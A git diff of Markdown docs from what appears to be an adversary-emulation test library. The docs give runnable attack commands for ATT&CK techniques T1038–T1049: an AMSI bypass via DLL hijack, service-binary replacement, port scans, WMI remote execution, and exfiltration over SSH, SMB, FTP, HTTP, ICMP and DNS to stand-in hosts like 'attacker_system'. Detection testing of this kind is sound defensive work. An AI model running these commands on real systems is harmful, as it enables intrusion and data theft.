(Citation: Microsoft DLL Redirection) (Citation: Microsoft Manifests) (Citation: Mandiant Search Order) +Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest +or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence +or privilege escalation. (Citation: Microsoft DLL Redirection) (Citation: Microsoft Manifests) (Citation: Mandiant +Search Order) -If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. +If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL +that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege +escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. -Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
+Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to +also load the legitimate DLLs they were meant to replace. ## Atomic Tests - [Atomic Test #1 - DLL Search Order Hijacking - amsi.dll](#atomic-test-1---dll-search-order-hijacking---amsidll) -
## Atomic Test #1 - DLL Search Order Hijacking - amsi.dll -Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface) + +Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in +order to bypass AMSI (Anti-Malware Scanning Interface) https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ -Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path. +Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a +non-standard path. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe @@ -39,13 +48,10 @@ copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll ``` #### Cleanup Commands: + ```cmd del %APPDATA%\updater.exe >nul 2>&1 del %APPDATA%\amsi.dll >nul 2>&1 ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1040.md b/Atomic_Threat_Coverage/Triggers/T1040.md
index f82f36b7..cc5892bf 100644
--- a/Atomic_Threat_Coverage/Triggers/T1040.md
+++ b/Atomic_Threat_Coverage/Triggers/T1040.md
@@ -1,10 +1,17 @@
 # T1040 - Network Sniffing + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1040) +
Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. -Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and Relay](https://attack.mitre.org/techniques/T1171), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. +Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted +protocol. Techniques for name service resolution poisoning, such +as [LLMNR/NBT-NS Poisoning and Relay](https://attack.mitre.org/techniques/T1171), can also be used to capture +credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. -Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (ex: IP addressing, hostnames, VLAN IDs) necessary for follow-on Lateral Movement and/or Defense Evasion activities.
+Network sniffing may also reveal configuration details, such as running services, version numbers, and other network +characteristics (ex: IP addressing, hostnames, VLAN IDs) necessary for follow-on Lateral Movement and/or Defense Evasion +activities. ## Atomic Tests @@ -16,74 +23,58 @@ Network sniffing may also reveal configuration details, such as running services - [Atomic Test #4 - Packet Capture PowerShell](#atomic-test-4---packet-capture-powershell) -
## Atomic Test #1 - Packet Capture Linux + Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed. -Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33. +Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33. **Supported Platforms:** Linux - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | interface | Specify interface to perform PCAP on. | String | ens33| - -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) ```bash tcpdump -c 5 -nnni #{interface} tshark -c 5 -i #{interface} ``` - - - - -

## Atomic Test #2 - Packet Capture macOS + Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed. Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface en0A. **Supported Platforms:** macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | interface | Specify interface to perform PCAP on. | String | en0A| - -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) ```bash tcpdump -c 5 -nnni #{interface} tshark -c 5 -i #{interface} ``` - - - - -

## Atomic Test #3 - Packet Capture Windows Command Prompt + Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark installed, along with WinPCAP. Windump will require the windump executable. @@ -91,32 +82,24 @@ Upon successful execution, tshark will execute and capture 5 packets on interfac **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | interface | Specify interface to perform PCAP on. | String | Ethernet0| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 c:\windump.exe ``` - - - - -

## Atomic Test #4 - Packet Capture PowerShell + Perform a packet capture using PowerShell with windump or tshark. This will require a host that has Wireshark/Tshark installed, along with WinPCAP. Windump will require the windump executable. @@ -124,26 +107,17 @@ Upon successful execution, tshark will spawn from powershell and capture 5 packe **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | interface | Specify interface to perform PCAP on. | String | Ethernet0| - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell & "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 & c:\windump.exe ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1042.md b/Atomic_Threat_Coverage/Triggers/T1042.md
index 2856a413..761398e5 100644
--- a/Atomic_Threat_Coverage/Triggers/T1042.md
+++ b/Atomic_Threat_Coverage/Triggers/T1042.md
@@ -1,52 +1,52 @@
 # T1042 - Change Default File Association + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1042) +
When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. -System file associations are listed under HKEY_CLASSES_ROOT\.[extension], for example HKEY_CLASSES_ROOT\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\[handler]\shell\[action]\command. For example: +System file associations are listed under HKEY_CLASSES_ROOT\.[extension], for example +HKEY_CLASSES_ROOT\.txt. The entries point to a handler for that extension located at +HKEY_CLASSES_ROOT\[handler]. The various commands are then listed as subkeys underneath the shell key at +HKEY_CLASSES_ROOT\[handler]\shell\[action]\command. For example: + * HKEY_CLASSES_ROOT\txtfile\shell\open\command * HKEY_CLASSES_ROOT\txtfile\shell\print\command * HKEY_CLASSES_ROOT\txtfile\shell\printto\command -The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)
+The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can +modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012) ## Atomic Tests - [Atomic Test #1 - Change Default File Association](#atomic-test-1---change-default-file-association) -
## Atomic Test #1 - Change Default File Association + Change Default File Association From cmd.exe of hta to notepad. -Upon successful execution, cmd.exe will change the file association of .hta to notepad.exe. +Upon successful execution, cmd.exe will change the file association of .hta to notepad.exe. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | extension_to_change | File Extension To Hijack | String | .hta| | target_extension_handler | txtfile maps to notepad.exe | Path | txtfile| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd assoc #{extension_to_change}=#{target_extension_handler} ``` #### Cleanup Commands: + ```cmd assoc .hta=htafile ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1044.md b/Atomic_Threat_Coverage/Triggers/T1044.md
index bfdf996d..29866fdd 100644
--- a/Atomic_Threat_Coverage/Triggers/T1044.md
+++ b/Atomic_Threat_Coverage/Triggers/T1044.md
@@ -1,46 +1,64 @@
 # T1044 - File System Permissions Weakness + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1044) +
Processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. -Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. +Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a +higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., +system bootup) then this technique can also be used for persistence. ### Services -Manipulation of Windows service binaries is one variation of this technique. Adversaries may replace a legitimate service executable with their own executable to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Once the service is started, either directly by the user (if appropriate access is available) or through some other means, such as a system restart if the service starts on bootup, the replaced executable will run instead of the original service executable. +Manipulation of Windows service binaries is one variation of this technique. 
Adversaries may replace a legitimate +service executable with their own executable to gain persistence and/or privilege escalation to the account context the +service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Once the service is +started, either directly by the user (if appropriate access is available) or through some other means, such as a system +restart if the service starts on bootup, the replaced executable will run instead of the original service executable. ### Executable Installers -Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088). Several examples of this weakness in existing common installers have been reported to software vendors. (Citation: Mozilla Firefox Installer DLL Hijack) (Citation: Seclists Kanthak 7zip Installer)
+Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, +self-extracting installers. During the installation process, it is common for installers to use a subdirectory within +the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create +subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for +execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. +This behavior is related to and may take advantage +of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). Some installers may also require elevated +privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related +to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088). Several examples of this weakness in +existing common installers have been reported to software vendors. (Citation: Mozilla Firefox Installer DLL Hijack) ( +Citation: Seclists Kanthak 7zip Installer) ## Atomic Tests - [Atomic Test #1 - File System Permissions Weakness](#atomic-test-1---file-system-permissions-weakness) -
## Atomic Test #1 - File System Permissions Weakness -This test to show checking file system permissions weakness and which can lead to privilege escalation by replacing malicious file. Example; check weak file permission and then replace. + +This test to show checking file system permissions weakness and which can lead to privilege escalation by replacing +malicious file. Example; check weak file permission and then replace. powershell -c "Get-WmiObject win32_service | select PathName" (check service file location) and -copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe ( replace weak permission file with malicious file ) +copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe ( replace weak permission file with +malicious file ) -Upon execution, open the weak permission file at %temp%\T1044_weak_permission_file.txt and verify that it's contents read "T1044 Malicious file". To verify -the weak file permissions, open File Explorer to%temp%\T1044_weak_permission_file.exe then open Properties and Security to view the Full Control permission is enabled. +Upon execution, open the weak permission file at %temp%\T1044_weak_permission_file.txt and verify that it's contents +read "T1044 Malicious file". To verify +the weak file permissions, open File Explorer to%temp%\T1044_weak_permission_file.exe then open Properties and Security +to view the Full Control permission is enabled. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | weak_permission_file | check weak files permission | path | $env:TEMP\T1044_weak_permission_file.txt| | malicious_file | File to replace weak permission file with | path | $env:TEMP\T1044\T1044_malicious_file.txt| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Get-WmiObject win32_service | select PathName 
@@ -48,37 +66,43 @@ Copy-Item #{malicious_file} -Destination #{weak_permission_file} -Force ``` #### Cleanup Commands: + ```powershell Remove-Item #{weak_permission_file} -Force -ErrorAction Ignore Remove-Item -Recurse (Split-Path #{malicious_file}) -Force -ErrorAction Ignore ``` - - #### Dependencies: Run with `powershell`! + ##### Description: A file must exist on disk at specified location (#{weak_permission_file}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{weak_permission_file}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item #{weak_permission_file} -Force | Out-Null Set-Content -Path #{weak_permission_file} -Value "T1044 Weak permission file" ``` + ##### Description: A file to replace the original weak_permission_file. In an attack this would be the malicious file gaining extra privileges + ##### Check Prereq Commands: + ```powershell if (Test-Path #{malicious_file}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory -Path $env:TEMP\T1044\ -Force | Out-Null New-Item #{malicious_file} -Force | Out-Null Set-Content -Path #{malicious_file} -Value "T1044 Malicious file" ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1046.md b/Atomic_Threat_Coverage/Triggers/T1046.md
index 943bbe3f..9146177d 100644
--- a/Atomic_Threat_Coverage/Triggers/T1046.md
+++ b/Atomic_Threat_Coverage/Triggers/T1046.md
@@ -1,8 +1,12 @@
 # T1046 - Network Service Scanning
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1046)
+
Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. -Within cloud environments, adversaries may attempt to discover services running on other cloud hosts or cloud services enabled within the environment. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems.
+Within cloud environments, adversaries may attempt to discover services running on other cloud hosts or cloud services +enabled within the environment. Additionally, if the cloud environment is connected to a on-premises environment, +adversaries may be able to identify services running on non-cloud systems. ## Atomic Tests @@ -10,22 +14,18 @@ Within cloud environments, adversaries may attempt to discover services running - [Atomic Test #2 - Port Scan Nmap](#atomic-test-2---port-scan-nmap) -
## Atomic Test #1 - Port Scan + Scan ports to check for listening ports. -Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout. +Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what +ports are open in the range of 1-65535. Results will be via stdout. **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh for port in {1..65535}; @@ -34,34 +34,27 @@ do done ``` - - - - -

## Atomic Test #2 - Port Scan Nmap + Scan ports to check for listening ports with Nmap. -Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout. +Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to +determine if listening. Results will be via stdout. **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | network_range | Network Range to Scan. | string | 192.168.1.0/24| | port | Ports to scan. | string | 80| | host | Host to scan. | string | 192.168.1.1| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh nmap -sS #{network_range} -p #{port} @@ -69,9 +62,4 @@ telnet #{host} #{port} nc -nv #{host} #{port} ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1047.md b/Atomic_Threat_Coverage/Triggers/T1047.md
index b8bc021e..1fa0044c 100644
--- a/Atomic_Threat_Coverage/Triggers/T1047.md
+++ b/Atomic_Threat_Coverage/Triggers/T1047.md
@@ -1,8 +1,12 @@
 # T1047 - Windows Management Instrumentation
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1047)
+
Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI) -An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI 2015)
+An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic +functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. ( +Citation: FireEye WMI 2015) ## Atomic Tests @@ -18,183 +22,138 @@ An adversary can use WMI to interact with local and remote systems and use it as - [Atomic Test #6 - WMI Execute Remote Process](#atomic-test-6---wmi-execute-remote-process) -
## Atomic Test #1 - WMI Reconnaissance Users -An adversary might use WMI to list all local User Accounts. + +An adversary might use WMI to list all local User Accounts. When the test completes , there should be local user accounts information displayed on the command line. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd wmic useraccount get /ALL /format:csv ``` - - - - -

## Atomic Test #2 - WMI Reconnaissance Processes + An adversary might use WMI to list Processes running on the compromised host. When the test completes , there should be running processes listed on the command line. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd wmic process get caption,executablepath,commandline /format:csv ``` - - - - -

## Atomic Test #3 - WMI Reconnaissance Software + An adversary might use WMI to list installed Software hotfix and patches. When the test completes, there should be a list of installed patches and when they were installed. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd wmic qfe get description,installedOn /format:csv ``` - - - - -

## Atomic Test #4 - WMI Reconnaissance List Remote Services -An adversary might use WMI to check if a certain Remote Service is running on a remote device. + +An adversary might use WMI to check if a certain Remote Service is running on a remote device. When the test completes, a service information will be displayed on the screen if it exists. A common feedback message is that "No instance(s) Available" if the service queried is not running. -A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" +A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreacheable **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | node | Ip Address | String | 127.0.0.1| | service_search_string | Name Of Service | String | Spooler| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd wmic /node:"#{node}" service where (caption like "%#{service_search_string}%") ``` - - - - -

## Atomic Test #5 - WMI Execute Local Process + This test uses wmic.exe to execute a process on the local host. -When the test completes , a new process will be started locally .A notepad application will be started when input is left on default. +When the test completes , a new process will be started locally .A notepad application will be started when input is +left on default. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | process_to_execute | Name or path of process to execute. | String | notepad.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd wmic process call create #{process_to_execute} ``` #### Cleanup Commands: + ```cmd wmic process where name='#{process_to_execute}' delete >nul 2>&1 ``` - - - -

## Atomic Test #6 - WMI Execute Remote Process -This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter. + +This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node +parameter. To clean up, provide the same node input as the one provided to run the test -A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the default or provided IP is unreachable +A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the +default or provided IP is unreachable **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | node | Ip Address | String | 127.0.0.1| | process_to_execute | Name or path of process to execute. | String | notepad.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd wmic /node:"#{node}" process call create #{process_to_execute} ``` #### Cleanup Commands: + ```cmd wmic /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1 ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1048.md b/Atomic_Threat_Coverage/Triggers/T1048.md
index 016f91f6..f4683fd1 100644
--- a/Atomic_Threat_Coverage/Triggers/T1048.md
+++ b/Atomic_Threat_Coverage/Triggers/T1048.md
@@ -1,16 +1,20 @@
 # T1048 - Exfiltration Over Alternative Protocol
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1048)
+
Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different channels could include Internet Web services such as cloud storage. -Adversaries may leverage various operating system utilities to exfiltrate data over an alternative protocol. +Adversaries may leverage various operating system utilities to exfiltrate data over an alternative protocol. SMB command-line example: -* net use \\\attacker_system\IPC$ /user:username password && xcopy /S /H /C /Y C:\Users\\* \\\attacker_system\share_folder\ +* net use \\\attacker_system\IPC$ /user:username password && xcopy /S /H /C /Y C:\Users\\* + \\\attacker_system\share_folder\ Anonymous FTP command-line example:(Citation: Palo Alto OilRig Oct 2016) * echo PUT C:\Path\to\file.txt | ftp -A attacker_system +
## Atomic Tests @@ -25,168 +29,134 @@ Anonymous FTP command-line example:(Citation: Palo Alto OilRig Oct 2016) - [Atomic Test #5 - Exfiltration Over Alternative Protocol - DNS](#atomic-test-5---exfiltration-over-alternative-protocol---dns) -
## Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH + Input a domain and test Exfiltration over SSH Remote to Local -Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file. +Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz +file. **Supported Platforms:** macOS, Linux - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | target SSH domain | url | target.example.com| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz ``` - - - - -

## Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH + Input a domain and test Exfiltration over SSH Local to Remote -Upon successful execution, tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output. +Upon successful execution, tar will compress /Users/* directory and password protect the file modification +of `Users.tar.gz.enc` as output. **Supported Platforms:** macOS, Linux - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | target SSH domain | url | target.example.com| | user_name | username for domain | string | atomic| | password | password for user | string | atomic| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc' ``` - - - - -

## Atomic Test #3 - Exfiltration Over Alternative Protocol - HTTP + A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337. -Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded. +Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host +the directory with Python on port 1337, to be later downloaded. **Supported Platforms:** macOS, Linux +#### Run it with these steps! - - -#### Run it with these steps! 1. Victim System Configuration: - mkdir /tmp/victim-staging-area - echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt + mkdir /tmp/victim-staging-area + echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt 2. Using Python to establish a one-line HTTP server on victim system: - cd /tmp/victim-staging-area - python -m SimpleHTTPServer 1337 + cd /tmp/victim-staging-area + python -m SimpleHTTPServer 1337 3. To retrieve the data from an adversary system: - wget http://VICTIM_IP:1337/victim-file.txt - - - - - - + wget http://VICTIM_IP:1337/victim-file.txt

## Atomic Test #4 - Exfiltration Over Alternative Protocol - ICMP + Exfiltration of specified file over ICMP protocol. -Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout. +Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default +127.0.0.1). Results will be via stdout. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe| | ip_address | Destination IP address where the data should be sent. | String | 127.0.0.1| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) } ``` - - - - -

## Atomic Test #5 - Exfiltration Over Alternative Protocol - DNS + Exfiltration of specified file over DNS protocol. **Supported Platforms:** Linux +#### Run it with these steps! - - -#### Run it with these steps! 1. On the adversary machine run the below command. - tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt + tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> + received_data.txt 2. On the victim machine run the below commands. - xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done - -3. Once the data is received, use the below command to recover the data. - - cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r - - - - + xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done +3. Once the data is received, use the below command to recover the data. + cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r
diff --git a/Atomic_Threat_Coverage/Triggers/T1049.md b/Atomic_Threat_Coverage/Triggers/T1049.md
index 774c30a5..e1b4ca12 100644
--- a/Atomic_Threat_Coverage/Triggers/T1049.md
+++ b/Atomic_Threat_Coverage/Triggers/T1049.md
@@ -1,16 +1,26 @@
 # T1049 - System Network Connections Discovery
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1049)
+
Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. -An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) +An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds +or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the +same types of discovery techniques depending on the operating system, but the resulting information may include details +about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in +which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network +Overview)(Citation: Google VPC Overview) ### Windows -Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). +Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net +use," and "net session" with [Net](https://attack.mitre.org/software/S0039). -### Mac and Linux +### Mac and Linux -In Mac and Linux, netstat and lsof can be used to list current connections. 
who -a and w can be used to show which users are currently logged in, similar to "net session".
+In Mac and Linux, netstat and lsof can be used to list current connections. who +-a and w can be used to show which users are currently logged in, similar to "net session" +. ## Atomic Tests @@ -20,22 +30,17 @@ In Mac and Linux, netstat and lsof can be used to list - [Atomic Test #3 - System Network Connections Discovery Linux & MacOS](#atomic-test-3---system-network-connections-discovery-linux--macos) -
## Atomic Test #1 - System Network Connections Discovery + Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd netstat @@ -43,62 +48,39 @@ net use net sessions ``` - - - - -

